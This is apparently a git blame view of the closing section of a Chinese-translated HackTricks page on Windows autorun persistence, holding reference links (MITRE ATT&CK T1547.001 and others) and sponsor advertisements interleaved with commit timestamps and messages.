											2023-08-03 19:12:22 +00:00
+								## 更多
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**查找更多类似注册表的自动运行程序，请访问** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 参考资料
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								* [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
-												Translated ['windows-hardening/active-directory-methodology/README.md',

											
										
										
											2024-01-02 20:35:58 +00:00
+								* [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								* [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**漏洞悬赏提示**：**注册** Intigriti，一个由黑客创建的高级**漏洞悬赏平台**！立即加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达**$100,000**的悬赏！
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Translated ['windows-hardening/active-directory-methodology/README.md',

											
										
										
											2024-01-02 20:35:58 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								支持 HackTricks 的其他方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
 								* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
 								* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
 								* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>